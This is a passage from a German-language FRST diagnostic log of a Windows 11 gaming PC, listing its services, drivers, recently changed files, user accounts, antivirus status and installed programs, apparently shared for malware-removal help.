S3 BraveElevationService; C:\Program Files\BraveSoftware\Brave-Browser\Application\126.1.67.134\elevation_service.exe [2688024 2024-07-17] (Brave Software, Inc. -> Brave Software, Inc.)
S3 bravem; C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [166424 2024-04-14] (Brave Software, Inc. -> BraveSoftware Inc.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [11988424 2022-05-20] (Microsoft Corporation -> Microsoft Corporation)
S3 ComboCleaner.Guard; C:\Program Files (x86)\Combo Cleaner\ComboCleaner.Guard.exe [144616 2024-06-04] (RCS LT UAB -> RCS LT)
S3 ComboCleaner.WinService; C:\Program Files (x86)\Combo Cleaner\ComboCleaner.WinService.exe [152296 2024-06-04] (RCS LT UAB -> RCS LT)
R2 Easy Connection to Screen; C:\Program Files\Samsung\Easy Connection to Screen\Service.exe [367816 2023-01-13] (Samsung Electronics CO., LTD. -> )
S3 EasyAntiCheat_EOS; C:\Program Files (x86)\EasyAntiCheat_EOS\EasyAntiCheat_EOS.exe [955816 2023-10-01] (EasyAntiCheat Oy -> Epic Games, Inc.)
S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [934368 2022-03-03] (Epic Games Inc. -> Epic Games, Inc.)
S3 FileSyncHelper; C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncHelper.exe [3522992 2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
S3 Futuremark SystemInfo Service; C:\Program Files (x86)\Futuremark\SystemInfo\FMSISvc.exe [347408 2023-11-30] (Underwriters Laboratories Inc. -> Futuremark)
R2 LightKeeperService; C:\Program Files (x86)\MSI\MSI Center\Mystic Light\LightKeeperService.exe [92768 2023-05-10] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [8901528 2024-07-01] (Malwarebytes Inc. -> Malwarebytes)
S3 MBVpnTunnelService; C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe [3073888 2024-06-04] (Malwarebytes Inc. -> Malwarebytes)
R2 MDCoreSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MpDefenderCoreService.exe [1377416 2024-07-16] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 MSIREGISTER_MR; C:\Program Files (x86)\MSI\MSIRegister\MSIRegisterService.exe [2019504 2019-08-28] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.)
R2 MSI_Case_Service; C:\Program Files (x86)\MSI\MSI Center\Case\MSI_Case_Service.exe [74336 2023-07-10] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.)
R2 MSI_Center_Service; C:\Program Files (x86)\MSI\MSI Center\MSI_Central_Service.exe [154216 2023-08-17] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.)
R2 MSI_Companion_Service; C:\Program Files (x86)\MSI\MSI Center\Game Highlights\MSI_Companion_Service.exe [142648 2021-04-08] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.)
R2 MSI_Super_Charger_Service; C:\Program Files (x86)\MSI\MSI Center\Super Charger\MSI_Super_Charger_Service.exe [37104 2022-05-13] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI)
R2 MSI_VoiceControl_Service; C:\Program Files (x86)\MSI\MSI Center\Voice Control\VoiceControl_Service.exe [36880 2023-04-27] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.)
R2 Mystic_Light_Service; C:\Program Files (x86)\MSI\MSI Center\Mystic Light\Mystic_Light_Service.exe [37616 2022-04-28] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.)
R2 NortonSecurity; C:\Program Files\Norton Security\Engine\22.24.2.6\NortonSecurity.exe [344888 2024-03-04] (NortonLifeLock Inc. -> NortonLifelock Inc.)
R2 nsWscSvc; C:\Program Files\Norton Security\Engine\22.24.2.6\nsWscSvc.exe [1059176 2024-03-04] (NortonLifeLock Inc. -> NortonLifeLock Inc.)
R2 NVDisplay.ContainerLocalSystem; C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_493585427225c794\Display.NvContainer\NVDisplay.Container.exe [1275528 2024-02-08] (NVIDIA Corporation -> NVIDIA Corporation)
S3 OneDrive Updater Service; C:\Program Files\Microsoft OneDrive\24.132.0701.0002\OneDriveUpdaterService.exe [3864080 2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
S3 OverwolfUpdater; C:\Program Files (x86)\Common Files\Overwolf\OverwolfUpdater.exe [2370056 2024-07-23] (Overwolf Ltd -> Overwolf LTD)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\NisSrv.exe [3236728 2024-07-16] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MsMpEng.exe [133688 2024-07-16] (Microsoft Windows Publisher -> Microsoft Corporation)
===================== Treiber (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
R3 AmdTools64; C:\Windows\System32\drivers\AmdTools64.sys [63392 2020-06-16] (Microsoft Windows Hardware Compatibility Publisher -> )
S3 AppleKmdfFilter; C:\Windows\System32\drivers\AppleKmdfFilter.sys [39272 2023-06-27] (Apple Inc. -> Apple Inc.)
S3 AppleLowerFilter; C:\Windows\System32\drivers\AppleLowerFilter.sys [55608 2023-06-27] (Apple Inc. -> Apple Inc.)
S3 BdDci; C:\Windows\system32\DRIVERS\bddci.sys [800672 2023-10-27] (Microsoft Windows Hardware Compatibility Publisher -> Bitdefender)
R1 BHDrvx64; C:\Program Files\Norton Security\NortonData\22.23.5.106\Definitions\BASHDefs\20231204.001\BHDrvx64.sys [1706512 2023-09-28] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
S3 BthA2dp; C:\Windows\System32\drivers\BthA2dp.sys [532480 2022-05-07] (Microsoft Corporation) [Datei ist nicht signiert]
S3 BthHFEnum; C:\Windows\System32\drivers\bthhfenum.sys [184320 2022-05-07] (Microsoft Corporation) [Datei ist nicht signiert]
S3 BTHMODEM; C:\Windows\System32\drivers\bthmodem.sys [106496 2022-05-07] (Microsoft Corporation) [Datei ist nicht signiert]
R1 ccSet_NGC; C:\Windows\System32\drivers\NGCx64\1618020.006\ccSetx64.sys [198288 2024-03-04] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
S3 CH341SER_A64; C:\Windows\System32\Drivers\CH341S64.SYS [84640 2023-03-21] (Microsoft Windows Hardware Compatibility Publisher -> wch.cn)
R1 CTIIO; C:\Windows\system32\drivers\CtiIo64.sys [32296 2023-08-18] (Microsoft Windows Hardware Compatibility Publisher -> Creative Technology Innovation Co., LTd.)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [527832 2023-08-06] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
S3 EnigmaFileMonDriver; C:\Windows\system32\Drivers\EnigmaFileMonDriver.sys [88736 2024-07-18] (Microsoft Windows Hardware Compatibility Publisher -> EnigmaSoft Limited)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [159720 2023-08-07] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
S3 gdrv3; C:\Windows\System32\drivers\gdrv3.sys [45248 2023-08-18] (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.)
S3 gzflt; C:\Windows\System32\DRIVERS\gzflt.sys [177056 2021-10-10] (Microsoft Windows Hardware Compatibility Publisher -> BitDefender LLC)
R1 IDSVia64; C:\Program Files\Norton Security\NortonData\22.23.5.106\Definitions\IPSDefs\20231201.064\IDSvia64.sys [1554400 2023-10-19] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
S3 ipadtst2; C:\ProgramData\MSI\Super_Charger\ipadtst2_64.sys [26168 2021-01-12] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI)
R2 mbamchameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [221264 2024-07-15] (Microsoft Windows Hardware Compatibility Publisher -> Malwarebytes)
S0 MbamElam; C:\Windows\System32\DRIVERS\MbamElam.sys [21480 2024-06-04] (Microsoft Windows Early Launch Anti-Malware Publisher -> Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [239576 2024-07-15] (Microsoft Windows Hardware Compatibility Publisher -> Malwarebytes)
R1 MSIO; C:\Windows\system32\drivers\MsIo64.sys [19000 2023-04-05] (Microsoft Windows Hardware Compatibility Publisher -> MICSYS Technology Co., LTd)
S3 Netaapl; C:\Windows\System32\drivers\netaapl64.sys [23040 2023-08-09] (Microsoft Windows Hardware Compatibility Publisher -> Apple Inc.)
S3 nsvst_NGC; C:\Windows\System32\drivers\NGCx64\1618020.006\nsvst.sys [57120 2024-03-04] (NortonLifeLock Inc. -> NortonLifeLock Inc.)
R3 NTIOLib_CC_Clock; C:\Program Files (x86)\MSI\MSI Center\Lib\NTIOLib_X64.sys [14288 2017-07-10] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI)
R3 NTIOLib_CC_COMM; C:\Program Files (x86)\MSI\MSI Center\Lib\SYS\NTIOLib_X64.sys [32424 2023-07-31] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI)
R3 NTIOLib_CC_CPU; C:\Program Files (x86)\MSI\MSI Center\Super Charger\NTIOLib_X64.sys [14288 2017-07-10] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI)
R3 NTIOLib_MysticLight; C:\Program Files (x86)\MSI\MSI Center\Mystic Light\Lib\NTIOLib_X64.sys [32488 2023-11-20] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI)
R3 NvModuleTracker; C:\Windows\System32\DriverStore\FileRepository\nvmoduletracker.inf_amd64_0c1cc60a4b422185\NvModuleTracker.sys [45656 2022-07-14] (Nvidia Corporation -> NVIDIA Corporation)
R3 rt68cx21; C:\Windows\System32\DriverStore\FileRepository\rt68cx21x64.inf_amd64_e41dba7ae72d1e1a\rt68cx21x64.sys [458168 2021-10-05] (Microsoft Windows Hardware Compatibility Publisher -> Realtek)
S3 rtcx21; C:\Windows\System32\DriverStore\FileRepository\rtcx21x64.inf_amd64_516e5c9b75c49dc2\rtcx21x64.sys [539648 2022-05-06] (Microsoft Windows -> Realtek)
R3 SRTSP; C:\Windows\System32\drivers\NGCx64\1618020.006\SRTSP64.SYS [960640 2024-03-04] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
R1 SRTSPX; C:\Windows\System32\drivers\NGCx64\1618020.006\SRTSPX64.SYS [52864 2024-03-04] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
R0 SymEFASI; C:\Windows\System32\drivers\NGCx64\1618020.006\SYMEFASI64.SYS [2180248 2024-03-04] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
S0 SymELAM; C:\Windows\System32\drivers\NGCx64\1618020.006\SymELAM.sys [36016 2024-03-04] (Microsoft Windows Early Launch Anti-Malware Publisher -> Broadcom)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [100328 2023-08-07] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
R3 SymEvnt; C:\Program Files\Norton Security\NortonData\22.23.5.106\SymPlatform\SymEvnt.sys [722400 2022-06-28] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
R1 SymIRON; C:\Windows\System32\drivers\NGCx64\1618020.006\Ironx64.SYS [306872 2024-03-04] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
R1 SymNetS; C:\Windows\System32\drivers\NGCx64\1618020.006\symnets.sys [492720 2024-03-04] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
S3 Trufos; C:\Windows\System32\DRIVERS\Trufos.sys [633264 2022-04-16] (Microsoft Windows Hardware Compatibility Publisher -> Bitdefender)
S3 UsbNcm; C:\Windows\System32\drivers\UsbNcm.sys [167936 2023-11-15] (Microsoft Windows -> )
S0 WdBoot; C:\Windows\System32\drivers\wd\WdBoot.sys [21968 2024-07-16] (Microsoft Windows Early Launch Anti-Malware Publisher -> Microsoft Corporation)
U5 WdDevFlt; C:\Windows\System32\Drivers\WdDevFlt.sys [169232 2022-05-07] (Microsoft Windows -> Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\wd\WdFilter.sys [602520 2024-07-16] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [105864 2024-07-16] (Microsoft Windows -> Microsoft Corporation)
S3 wpCtrlDrv_NGC; C:\Windows\System32\drivers\NGCx64\1618020.006\wpCtrlDrv.sys [1016792 2024-03-04] (NortonLifeLock Inc. -> NortonLifeLock Inc.)
==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2024-07-24 22:00 - 2024-07-24 22:00 - 000550849 _____ (glax24 (safezone.cc)) C:\Users\skysc\Downloads\SecurityCheck.exe
2024-07-24 15:04 - 2024-07-24 15:04 - 000000000 ____D C:\Windows\system32\Tasks\Remediation
2024-07-24 13:54 - 2024-07-24 13:54 - 000720434 _____ C:\Windows\system32\perfh007.dat
2024-07-24 13:54 - 2024-07-24 13:54 - 000148474 _____ C:\Windows\system32\perfc007.dat
2024-07-23 15:17 - 2024-07-23 15:17 - 007642872 _____ C:\Users\skysc\Desktop\23.07.2024_15.17.12.zip
2024-07-23 15:16 - 2024-07-23 15:30 - 000017112 _____ C:\Users\skysc\Desktop\Fixlog.txt
2024-07-22 15:43 - 2024-07-22 15:43 - 000002420 _____ C:\Users\skysc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Lunar Client.lnk
2024-07-20 14:26 - 2024-07-20 14:27 - 219475448 _____ (SUPERAntiSpyware) C:\Users\skysc\Downloads\SUPERAntiSpyware.exe
==================== Ein Monat (geänderte) ==================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2024-07-24 22:01 - 2024-05-27 21:26 - 000000000 ____D C:\FRST
2024-07-24 22:01 - 2024-04-14 15:22 - 000002363 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Brave.lnk
2024-07-24 22:01 - 2024-04-14 15:22 - 000002322 _____ C:\Users\Public\Desktop\Brave.lnk
2024-07-24 22:01 - 2024-04-02 21:44 - 000000000 ____D C:\Windows\system32\Tasks\Norton 360
2024-07-24 22:01 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\SystemTemp
2024-07-24 21:55 - 2023-09-19 15:17 - 000000000 ____D C:\Users\skysc\AppData\Local\Overwolf
2024-07-24 21:55 - 2023-08-07 15:06 - 000000000 ____D C:\Program Files (x86)\Steam
2024-07-24 21:55 - 2023-08-07 14:12 - 000000000 ___RD C:\Users\skysc\OneDrive
2024-07-24 21:55 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\AppReadiness
2024-07-24 21:54 - 2024-06-09 14:12 - 000000000 ____D C:\Windows\system32\Tasks\PowerToys
2024-07-24 21:54 - 2023-08-21 17:42 - 000000000 ____D C:\Users\skysc\AppData\Local\CrashDumps
2024-07-24 21:54 - 2022-06-22 10:35 - 000000000 ____D C:\ProgramData\NVIDIA
2024-07-24 21:54 - 2022-06-22 10:16 - 000012288 ___SH C:\DumpStack.log.tmp
2024-07-24 21:54 - 2022-06-22 10:16 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2024-07-24 21:54 - 2022-05-07 07:24 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2024-07-24 16:00 - 2022-05-07 07:17 - 000786432 _____ C:\Windows\system32\config\BBI
2024-07-24 15:58 - 2023-08-08 19:27 - 000000000 ____D C:\Users\skysc\AppData\Local\Norton
2024-07-24 15:46 - 2024-06-04 17:30 - 000000000 ____D C:\Users\skysc\AppData\Local\Malwarebytes
2024-07-24 15:41 - 2023-08-07 17:42 - 000000000 ____D C:\Users\skysc\AppData\Roaming\.minecraft
2024-07-24 15:40 - 2023-08-07 14:18 - 000000000 ____D C:\Users\skysc\AppData\Local\D3DSCache
2024-07-24 15:35 - 2023-08-08 23:11 - 000000000 ____D C:\Users\skysc\AppData\Roaming\vlc
2024-07-24 14:39 - 2022-05-07 07:24 - 000000000 ___HD C:\Program Files\WindowsApps
2024-07-24 13:54 - 2022-06-22 10:23 - 001660532 _____ C:\Windows\system32\PerfStringBackup.INI
2024-07-24 13:54 - 2022-05-07 07:22 - 000000000 ____D C:\Windows\INF
2024-07-24 12:53 - 2024-05-25 20:06 - 000002246 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2024-07-24 12:53 - 2024-05-25 20:06 - 000002205 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2024-07-24 12:53 - 2023-09-19 15:20 - 000000000 ____D C:\Program Files (x86)\Overwolf
2024-07-24 12:52 - 2022-06-22 10:16 - 000000000 ____D C:\Windows\system32\SleepStudy
2024-07-23 23:31 - 2023-11-11 18:24 - 000000000 ____D C:\Users\skysc\AppData\Roaming\discord
2024-07-23 15:17 - 2023-08-08 22:03 - 000000000 ____D C:\Users\skysc\AppData\LocalLow\Temp
2024-07-22 19:50 - 2023-08-09 20:01 - 000000000 ____D C:\Users\skysc\OneDrive\Microsoft Edge Drop Files\Dokumente\Audioaufzeichnungen
2024-07-22 15:43 - 2023-08-07 14:12 - 000000000 ____D C:\Users\skysc
2024-07-22 14:42 - 2022-05-07 07:17 - 000032768 _____ C:\Windows\system32\config\ELAM
2024-07-20 21:23 - 2024-06-02 18:45 - 000001607 _____ C:\Windows\system32\config\VSMIDK
2024-07-20 21:23 - 2023-08-08 14:20 - 000000000 ____D C:\Program Files\Microsoft OneDrive
2024-07-20 17:58 - 2022-06-22 10:18 - 000000000 ____D C:\ProgramData\Packages
2024-07-20 15:58 - 2023-08-07 17:35 - 000000000 ____D C:\XboxGames
2024-07-20 15:58 - 2023-08-07 14:18 - 000000000 ____D C:\Users\skysc\AppData\Local\Packages
2024-07-20 15:31 - 2023-11-09 14:14 - 000003596 _____ C:\Windows\system32\Tasks\OneDrive Reporting Task-S-1-5-21-1221853621-2447620182-1933698513-1002
2024-07-20 15:31 - 2023-08-07 14:20 - 000003596 _____ C:\Windows\system32\Tasks\OneDrive Reporting Task-S-1-5-21-1221853621-2447620182-1933698513-1001
2024-07-20 15:31 - 2022-06-22 10:19 - 000003194 _____ C:\Windows\system32\Tasks\OneDrive Per-Machine Standalone Update Task
2024-07-20 15:31 - 2022-06-22 10:19 - 000002155 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2024-07-20 14:52 - 2024-05-27 21:44 - 000000000 ____D C:\Users\skysc\AppData\Local\Google
2024-07-20 14:48 - 2024-05-22 20:55 - 000002443 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2024-07-20 14:48 - 2024-05-22 20:55 - 000002281 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2024-07-20 14:39 - 2022-05-07 07:24 - 000000000 ___HD C:\Windows\ELAMBKUP
2024-07-19 20:47 - 2024-04-14 15:22 - 000004024 _____ C:\Windows\system32\Tasks\BraveSoftwareUpdateTaskMachineUA{A5CFE2E1-9623-44C3-B3C8-B178FBF5D7D2}
2024-07-19 20:47 - 2024-04-14 15:22 - 000003900 _____ C:\Windows\system32\Tasks\BraveSoftwareUpdateTaskMachineCore{DFB371DD-43E6-4228-ACFE-FADEACBD0C31}
2024-07-18 14:31 - 2023-11-11 18:24 - 000002002 _____ C:\Users\skysc\Desktop\Discord.lnk
2024-07-17 19:25 - 2024-05-27 21:48 - 000000000 ____D C:\Users\skysc\AppData\Local\GUI
2024-07-17 16:49 - 2022-06-22 10:36 - 000000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2024-07-16 17:08 - 2024-02-17 14:40 - 000267880 _____ (Microsoft Corporation) C:\Windows\system32\gamingservicesproxy_4.dll
2024-07-16 17:08 - 2023-08-07 17:35 - 002799208 _____ (Microsoft Corporation) C:\Windows\system32\xgameruntime.dll
2024-07-16 17:08 - 2023-08-07 17:35 - 000751208 _____ (Microsoft Corporation) C:\Windows\system32\gameplatformservices.dll
2024-07-16 17:08 - 2023-08-07 17:35 - 000222816 _____ (Microsoft Corporation) C:\Windows\system32\gameconfighelper.dll
2024-07-16 17:08 - 2023-08-07 17:35 - 000206440 _____ (Microsoft Corporation) C:\Windows\system32\gamelaunchhelper.dll
2024-07-16 17:08 - 2023-08-07 17:35 - 000145000 _____ (Microsoft Corporation) C:\Windows\system32\gamingtcuihelpers.dll
2024-07-16 17:08 - 2023-08-07 17:35 - 000108136 _____ (Microsoft Corporation) C:\Windows\system32\xgamehelper.exe
2024-07-16 17:08 - 2023-08-07 17:35 - 000075368 _____ (Microsoft Corporation) C:\Windows\system32\xgamecontrol.exe
2024-07-16 15:17 - 2022-06-22 10:16 - 000000000 ____D C:\Windows\system32\Drivers\wd
2024-07-15 17:42 - 2024-06-04 17:29 - 000239576 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2024-07-12 15:57 - 2022-06-22 10:16 - 000474232 _____ C:\Windows\system32\FNTCACHE.DAT
2024-07-12 15:56 - 2023-12-14 23:09 - 000000000 ____D C:\Windows\InboxApps
2024-07-12 15:56 - 2023-10-11 20:19 - 000000000 ____D C:\Windows\system32\Microsoft-Edge-WebView
2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ___RD C:\Windows\ImmersiveControlPanel
2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\UUS
2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\SysWOW64\WinMetadata
2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\SystemResources
2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\system32\WinMetadata
2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\system32\Sgrm
2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\system32\SecureBootUpdates
2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\system32\oobe
2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\ShellExperiences
2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\ShellComponents
2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\Provisioning
2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\PolicyDefinitions
2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\bcastdvr
2024-07-12 14:43 - 2022-06-22 10:16 - 000003754 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2024-07-12 14:43 - 2022-06-22 10:16 - 000003630 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2024-07-11 14:49 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\ServiceState
2024-07-09 20:55 - 2022-05-07 07:24 - 000000000 ____D C:\ProgramData\USOPrivate
2024-07-09 20:51 - 2023-08-07 17:05 - 000000000 ____D C:\Windows\system32\MRT
2024-07-09 20:50 - 2023-08-07 17:05 - 194135240 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2024-07-09 20:44 - 2022-05-07 07:17 - 000000000 ____D C:\Windows\CbsTemp
2024-07-09 20:42 - 2022-06-22 10:19 - 003212800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PrintConfig.dll
2024-07-01 18:05 - 2024-05-29 17:26 - 000000000 ____D C:\Users\skysc\AppData\LocalLow\Norton
2024-06-30 20:23 - 2023-08-20 18:23 - 000000000 ____D C:\Users\skysc\AppData\Roaming\Microsoft\Word
2024-06-27 14:17 - 2024-05-28 21:28 - 000000000 ____D C:\ProgramData\Avast Software
2024-06-26 21:39 - 2023-08-13 22:30 - 000000000 ____D C:\Users\skysc\AppData\Roaming\Code
2024-06-24 14:31 - 2023-08-13 22:30 - 000000000 ____D C:\Users\skysc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Visual Studio Code
2024-06-24 14:24 - 2024-05-23 16:54 - 000049704 _____ C:\Users\skysc\Downloads\Lebenslauf Jessika.pdf
2024-06-24 14:08 - 2024-06-18 19:47 - 000038589 _____ C:\Users\skysc\Downloads\Bewerbung Jessika.pdf
==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ========
2023-10-22 18:46 - 2023-10-22 18:46 - 000000028 _____ () C:\Users\skysc\AppData\Local\CapCutConfigure.ini
2023-10-22 20:57 - 2023-10-22 20:57 - 000001611 _____ () C:\Users\skysc\AppData\Local\recently-used.xbel
2024-05-25 19:34 - 2024-05-25 19:34 - 000000017 _____ () C:\Users\skysc\AppData\Local\resmon.resmoncfg
==================== SigCheck ============================
(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)
==================== Ende von FRST.txt ========================
Addition Log: FRST Additions Logfile: Code:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 24.07.2024
durchgeführt von skysc (24-07-2024 22:02:24)
Gestartet von C:\Users\skysc\Downloads\Neuer Ordner
Microsoft Windows 11 Home Version 23H2 22631.3880 (X64) (2023-08-07 12:09:18)
Start-Modus: Normal
==========================================================
==================== Konten: =============================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
Administrator (S-1-5-21-1221853621-2447620182-1933698513-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1221853621-2447620182-1933698513-503 - Limited - Disabled)
Gast (S-1-5-21-1221853621-2447620182-1933698513-501 - Limited - Disabled)
skysc (S-1-5-21-1221853621-2447620182-1933698513-1001 - Administrator - Enabled) => C:\Users\skysc
WDAGUtilityAccount (S-1-5-21-1221853621-2447620182-1933698513-504 - Limited - Disabled)
zweisky (S-1-5-21-1221853621-2447620182-1933698513-1002 - Limited - Enabled) => C:\Users\zweisky
==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Norton 360 for Gamers (Disabled - Out of date) {AECE2126-F4E7-6909-11F2-1B69D1FBCBD0}
FW: Norton 360 for Gamers (Disabled) {96F5A003-BE88-6851-3AAD-B25C2F288CAB}
==================== Installierte Programme ======================
(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
AMD Chipset Software (HKLM-x32\...\AMD_Chipset_IODrivers) (Version: 2.10.26.336 - Advanced Micro Devices, Inc.)
AMD GPIO2 Driver (HKLM-x32\...\{E9DD399F-21A3-479E-A7DF-D6CF4B2ADBF3}) (Version: 2.2.0.130 - Advanced Micro Devices, Inc.) Hidden
AMD PCI Driver (HKLM-x32\...\{80EC3CEE-2940-42A1-A776-B5D810D39F1E}) (Version: 1.0.0.81 - Advanced Micro Devices, Inc.) Hidden
AMD PSP Driver (HKLM-x32\...\{988F14B8-79A8-475D-BAC7-83F96AD3D821}) (Version: 4.13.0.0 - Advanced Micro Devices, Inc.) Hidden
AMD Ryzen Balanced Driver (HKLM-x32\...\{A171D320-C42C-4F3B-A2D8-C6A09F6788CC}) (Version: 6.0.0.7 - Advanced Micro Devices, Inc.) Hidden
AMD Ryzen Master SDK (HKLM\...\{DBD50508-5F75-416B-995D-C42433A00944}) (Version: 2.10.0.2198 - Advanced Micro Devices, Inc.)
AMD SBxxx SMBus Driver Alpha (HKLM-x32\...\{AAE0E27D-C88A-49BA-8715-77ADCD4286A3}) (Version: 5.12.0.38 - Advanced Micro Devices, Inc.) Hidden
AMD_Chipset_Drivers (HKLM-x32\...\{b7b5b85e-6364-4ab4-ab0f-3a89b0de0fe2}) (Version: 2.10.26.336 - Advanced Micro Devices, Inc.) Hidden
Autodesk Fusion 360 (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\73e72ada57b7480280f7a6f4a289729f) (Version: 2.0.16976 - Autodesk, Inc.)
blender (HKLM\...\{1589EDDA-7F97-49A7-A931-5646B819BC9E}) (Version: 4.1.0 - Blender Foundation)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Brave (HKLM-x32\...\BraveSoftware Brave-Browser) (Version: 127.1.68.128 - Die Brave-Autoren)
CapCut (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\CapCut) (Version: 2.6.0.814 - Bytedance Pte. Ltd.)
Combo Cleaner (HKLM\...\{8C9F8853-52F7-46F3-BC78-98001D3FF40C}) (Version: 1.0.63.0 - RCS LT) Hidden
